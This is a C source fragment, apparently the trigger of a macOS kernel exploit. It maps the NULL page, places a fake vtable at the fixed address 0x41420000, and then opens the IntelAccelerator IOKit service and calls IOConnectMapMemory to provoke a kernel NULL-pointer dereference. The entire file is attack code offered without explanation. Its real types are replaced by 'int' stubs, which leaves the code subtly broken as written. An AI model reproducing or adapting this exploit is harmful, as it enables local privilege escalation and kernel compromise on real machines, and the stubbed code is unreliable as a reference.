
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int uint64_t ;
typedef int mach_vm_size_t ;
typedef int mach_vm_address_t ;
typedef int kern_return_t ;
typedef int io_service_t ;
typedef int io_iterator_t ;
typedef int io_connect_t ;
typedef int CFMutableDictionaryRef ;


 int IOConnectMapMemory (int ,int,int ,int*,int*,int ) ;
 int IOIteratorNext (int ) ;
 int IOServiceGetMatchingServices (int ,int ,int *) ;
 int IOServiceMatching (char*) ;
 int IOServiceOpen (int ,int ,int,int *) ;
 int MACH_PORT_NULL ;
 int kIOMapAnywhere ;
 int kIOMasterPortDefault ;
 int mach_task_self () ;
 int mach_vm_allocate (int ,int*,int,int ) ;
 int memcpy (void*,void*,size_t) ;
 int memset (int,int ,int) ;
 int vm_allocate (int ,int*,int,int ) ;
 int vm_deallocate (int ,int,int) ;

void trigger(void* vtable, size_t vtable_len){

  mach_vm_address_t addr = 0x41420000 - 10 * 0x1000;
  mach_vm_allocate(mach_task_self(), &addr, 0x20*0x1000, 0);

  memset(addr, 0, 0x20*0x1000);
  memcpy((void*)0x41420000, vtable, vtable_len);


  vm_deallocate(mach_task_self(), 0x0, 0x1000);
  addr = 0;
  vm_allocate(mach_task_self(), &addr, 0x1000, 0);
  char* np = 0;
  for (int i = 0; i < 0x1000; i++){
    np[i] = 'A';
  }

  volatile uint64_t* zero = 0;
  *zero = 0x41420000;


  CFMutableDictionaryRef matching = IOServiceMatching("IntelAccelerator");
  io_iterator_t iterator;
  kern_return_t err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);

  io_service_t service = IOIteratorNext(iterator);
  io_connect_t conn = MACH_PORT_NULL;
  err = IOServiceOpen(service, mach_task_self(), 2, &conn);

  addr = 0x12345000;
  mach_vm_size_t size = 0x1000;

  err = IOConnectMapMemory(conn, 3, mach_task_self(), &addr, &size, kIOMapAnywhere);
}
